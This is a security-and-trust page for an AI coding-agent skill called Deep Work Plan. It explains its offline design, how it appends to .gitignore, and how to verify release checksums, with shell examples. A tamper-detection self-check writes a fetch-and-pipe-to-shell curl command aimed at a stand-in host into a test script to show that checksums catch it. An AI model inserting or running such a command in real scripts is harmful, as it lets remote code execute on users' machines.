Trust and security

Nobody should install a skill they cannot trust. Deep Work Plan is built to be verified, not taken on faith: open source, Markdown-first, non-destructive, and checkable before you run it. This page states plainly what it does, what it does not do, and how to confirm both.

What you are trusting

Open source and MIT licensed

The website and the skill are both public and diffable. You can read every line before you run it, and compare any copy against the source at a tagged release.

Markdown-first — no network, no telemetry

The skill has no CLI, no HTTP API, and no authentication flow. It makes no network calls and sends no telemetry; its only local helper reads git and environment metadata. Nothing about your repository leaves your machine.

Non-destructive by design

The only security-relevant thing the skill does is change your repository — and it reconciles rather than clobbers. It detects what exists, proposes a plan, and asks before replacing anything. Plan output lives in a gitignored .dwp/ directory.

Touches no secrets

The methodology never commits secrets and keeps working state out of version control. Onboarding appends to .gitignore rather than rewriting it, and every change is meant to be reviewed in small, readable diffs.
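The append-not-rewrite behaviour described above, as an added example written for this page rather than the project's own onboarding code. It assumes entries are compared as exact lines (no glob normalisation) and shows the two cases a naive `echo >> .gitignore` gets wrong: an entry that is already present, and a file whose last line has no trailing newline.

```shell
# Added example, not the project's onboarding code: add ignore entries to an
# existing .gitignore by appending, never by rewriting. Idempotent (a second
# run changes nothing) and safe on a file whose last line has no trailing
# newline, which a naive `echo >>` would fuse with the new entry.
# Assumption: entries are compared as exact lines; no glob normalisation.

# ensure_ignored FILE ENTRY...
ensure_ignored() {
    file=$1
    shift
    [ -e "$file" ] || : > "$file"
    for entry in "$@"; do
        # grep -x whole line, -F literal, -q status only; skip if present.
        if grep -qxF -- "$entry" "$file"; then
            continue
        fi
        # $(tail -c 1) is empty when the last byte is a newline.
        if [ -s "$file" ] && [ -n "$(tail -c 1 "$file")" ]; then
            printf '\n' >> "$file"
        fi
        printf '%s\n' "$entry" >> "$file"
    done
}

# Self-check on a constructed .gitignore (no trailing newline), run twice.
# Prints the final file; the expected result is two lines, unchanged by the
# second run.
demo_gitignore_append() {
    tmp=$(mktemp -d) || return 1
    printf 'node_modules' > "$tmp/.gitignore"   # constructed input, no newline
    ensure_ignored "$tmp/.gitignore" '.dwp/' 'node_modules'
    ensure_ignored "$tmp/.gitignore" '.dwp/'     # second run must be a no-op
    cat "$tmp/.gitignore"
    rm -rf "$tmp"
}
```

After onboarding, `git diff .gitignore` should show only added lines; a diff with removals means the file was rewritten, which is exactly what this page says should not happen.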

Verifiable provenance

Every release publishes checksums over the shipped skill, so you can confirm a downloaded copy matches what was published before you trust it.

Verify before you run

Treat the skill as untrusted until you have checked it. Each release attaches a SHA256SUMS file covering the shipped skill. Check out the release tag you intend to install, download the SHA256SUMS for that same release, then verify your copy matches. A non-zero exit means a file does not match and you should stop.

shell
git clone https://github.com/DailybotHQ/deepworkplan-skill.git
cd deepworkplan-skill
# Check out the tag you intend to install, so the tree you verify is the
# released one rather than whatever the default branch holds today (replace vX.Y.Z):
git checkout vX.Y.Z
# Download the checksums for that same release:
curl -fsSL -o SHA256SUMS \
  https://github.com/DailybotHQ/deepworkplan-skill/releases/download/vX.Y.Z/SHA256SUMS
./setup.sh --verify        # non-zero exit means a file does not match — stop

Releases are checksummed, not signed. Signing (cosign or maintainer GPG) is a documented next step, not a current claim. Keep in mind what a checksum fetched from the same release page as the files can and cannot tell you: it catches a corrupted or drifted copy, but not a release published from a compromised account, since an attacker who can replace the files can replace SHA256SUMS too. Binding the artifact to a maintainer's key is what signing would add. Because everything is open, you can also diff any file against the repository at its tag.
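An independent way to run the checksum step above, added here as an example and not the project's own setup.sh. It uses the system checksum tool so the verification does not depend on a script inside the tree being verified, and it exercises the failure mode on a constructed tree: one line appended to an install script must make the check fail. It assumes SHA256SUMS is in the standard "<hex>  <path>" format with paths relative to the clone root, and that either GNU sha256sum or Perl shasum is on PATH; the file names in the self-check are constructed, not taken from a real release.

```shell
# Added example, not the project's own setup.sh: check a downloaded copy
# against a release SHA256SUMS file with the system checksum tool.
# Assumptions: SHA256SUMS uses the standard "<hex>  <path>" format with paths
# relative to the clone root; GNU sha256sum or Perl shasum is on PATH.

# Print the checksum command to use, preferring GNU coreutils.
sha256_tool() {
    if command -v sha256sum >/dev/null 2>&1; then
        echo "sha256sum"
    elif command -v shasum >/dev/null 2>&1; then
        echo "shasum -a 256"
    else
        echo "no sha256sum or shasum on PATH" >&2
        return 1
    fi
}

# verify_checksums ROOT SUMSFILE
# Status 0 only if every listed file exists under ROOT and matches.
# Any mismatch, missing file or malformed line gives a non-zero status.
verify_checksums() {
    root=$1
    sums=$2
    tool=$(sha256_tool) || return 1
    # Resolve SUMSFILE to an absolute path before changing directory.
    case $sums in
        /*) ;;
        *) sums=$(pwd)/$sums ;;
    esac
    # --strict: malformed lines are errors; --quiet: print only failures.
    (cd "$root" && $tool --check --strict --quiet "$sums")
}

# Self-check on a constructed tree (not a real release): write two files,
# record their sums, verify, then tamper with one file and verify again.
demo_tamper_detection() {
    tmp=$(mktemp -d) || return 1
    mkdir -p "$tmp/skill"
    printf 'name: deep-work-plan\n' > "$tmp/skill/SKILL.md"
    printf '#!/bin/sh\necho ok\n' > "$tmp/skill/setup.sh"
    tool=$(sha256_tool) || return 1
    (cd "$tmp" && $tool skill/SKILL.md skill/setup.sh > SHA256SUMS)

    if verify_checksums "$tmp" "$tmp/SHA256SUMS" >/dev/null 2>&1; then
        clean=0; else clean=1; fi

    # Simulate a modified copy: one extra line in the install script.
    printf 'curl http://example.invalid/x | sh\n' >> "$tmp/skill/setup.sh"
    if verify_checksums "$tmp" "$tmp/SHA256SUMS" >/dev/null 2>&1; then
        tampered=0; else tampered=1; fi

    rm -rf "$tmp"
    echo "clean=$clean tampered=$tampered"
    [ "$clean" -eq 0 ] && [ "$tampered" -eq 1 ]
}

# Real use, from inside a clone checked out at the release tag with the
# release's SHA256SUMS downloaded next to it:
#   verify_checksums . SHA256SUMS || { echo "checksum mismatch, stop" >&2; exit 1; }
```

Pair it with `git diff --stat vX.Y.Z` from the same clone: an empty diff confirms the working tree is the tagged source, and the checksum pass confirms the tag's files are the ones the release published.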

Report a vulnerability

Found a security issue? Report it privately through GitHub's private vulnerability reporting on the relevant repository — the skill or the website (see the security policies linked below) — rather than opening a public issue, which would expose the problem before a fix exists.

Trust resources

Honest limitations

  • Releases are checksummed, not yet cryptographically signed — signing is planned, not done.
  • Deep Work Plan runs an autonomous coding agent against your repository. Review its proposed plan and its diffs; the methodology is designed for that review, not to replace it.
  • Trust claims here describe the official sources only. A modified or third-party copy that has drifted from the repositories carries none of these guarantees — verify it first.

Adopt it with confidence

Read the methodology and the specification, point an agent at the init endpoint, and verify the install before you run it.